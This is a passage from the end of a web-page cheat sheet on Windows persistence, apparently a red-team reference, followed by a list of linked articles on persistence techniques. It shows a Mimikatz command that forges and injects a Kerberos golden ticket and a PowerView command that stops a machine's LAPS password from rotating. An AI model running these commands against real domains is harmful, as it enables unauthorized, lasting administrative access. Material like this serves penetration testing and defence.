<a id="__codelineno-38-2" name="__codelineno-38-2" href="#__codelineno-38-2"></a><span class="n">kerberos</span><span class="p">::</span><span class="n">golden</span> <span class="p">/</span><span class="n">user</span><span class="p">:</span><span class="n">evil</span> <span class="p">/</span><span class="n">domain</span><span class="p">:</span><span class="n">pentestlab</span><span class="p">.</span><span class="n">local</span> <span class="p">/</span><span class="n">sid</span><span class="p">:</span><span class="n">S</span><span class="p">-</span><span class="n">1</span><span class="p">-</span><span class="n">5</span><span class="p">-</span><span class="n">21</span><span class="p">-</span><span class="n">3737340914</span><span class="p">-</span><span class="n">2019594255</span><span class="p">-</span><span class="n">2413685307</span> <span class="p">/</span><span class="n">krbtgt</span><span class="p">:</span><span class="n">d125e4f69c851529045ec95ca80fa37e</span> <span class="p">/</span><span class="n">ticket</span><span class="p">:</span><span class="n">evil</span><span class="p">.</span><span class="n">tck</span> <span class="p">/</span><span class="n">ptt</span>
<a id="__codelineno-38-3" name="__codelineno-38-3" href="#__codelineno-38-3"></a><span class="n">kerberos</span><span class="p">::</span><span class="n">tgt</span>
</code></pre></div>
<h3 id="laps-persistence">LAPS Persistence</h3>
<p>To prevent a machine to update its LAPS password, it is possible to set the update date in the futur.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-39-1" name="__codelineno-39-1" href="#__codelineno-39-1"></a><span class="nb">Set-DomainObject</span> <span class="n">-Identity</span> <span class="p">&lt;</span><span class="n">target_machine</span><span class="p">&gt;</span> <span class="n">-Set</span> <span class="p">@{</span><span class="s2">&quot;ms-mcs-admpwdexpirationtime&quot;</span><span class="p">=</span><span class="s2">&quot;232609935231523081&quot;</span><span class="p">}</span>
</code></pre></div>
<h2 id="references">References</h2>
<ul>
<li><a href="http://pwnwiki.io/#!persistence/windows/index.md">Windows Persistence Commands - Pwn Wiki</a></li>
<li><a href="http://www.youtube.com/watch?v=K7o9RSVyazo">SharPersist Windows Persistence Toolkit in C - Brett Hawkins</a></li>
<li><a href="https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/">IIS Raid Backdooring IIS Using Native Modules - 19/02/2020</a></li>
<li><a href="https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html">Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa</a></li>
<li><a href="https://github.com/netbiosX/Checklists/blob/master/Persistence.md">Persistence - Checklist - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/">Persistence Winlogon Helper DLL - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2019/10/30/persistence-bits-jobs/">Persistence - BITS Jobs - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/">Persistence Image File Execution Options Injection - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/">Persistence Registry Run Keys - @netbiosX</a></li>
<li><a href="https://pentestlab.blog/2021/11/15/golden-certificate/">Golden Certificate - NOVEMBER 15, 2021</a></li>
<li><a href="https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/">Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi</a></li>
<li><a href="https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html">Persistence via WMI Event Subscription - Elastic Security Solution</a></li>
<li><a href="https://0xv1n.github.io/posts/scmanager/">PrivEsc: Abusing the Service Control Manager for Stealthy &amp; Persistent LPE - 0xv1n - 2023-02-27</a></li>
<li><a href="https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11)">Sc sdset - Microsoft - 08/31/2016</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">November 9, 2024</span>
</span>
</aside>
<div class="social-container">
<b>Share this content</b>
<div class="a2a_kit a2a_kit_size_32 a2a_default_style">
<a class="a2a_dd" href="https://www.addtoany.com/share"></a>
<a class="a2a_button_x"></a>
<a class="a2a_button_telegram"></a>
<a class="a2a_button_linkedin"></a>
<a class="a2a_button_email"></a>
<a class="a2a_button_microsoft_teams"></a>
</div>
<br>
<script async src="https://static.addtoany.com/menu/page.js"></script>
</div>
<script defer src="https://cloud.umami.is/script.js" data-website-id="49aad71c-7d98-4635-8bd5-b6799c8874f8"></script>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "../../..", "features": ["content.code.copy", "content.action.edit", "content.action.view", "content.tooltips", "navigation.tracking", "navigation.top", "search.share", "search.suggest"], "search": "../../../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../../../assets/javascripts/bundle.83f73b43.min.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink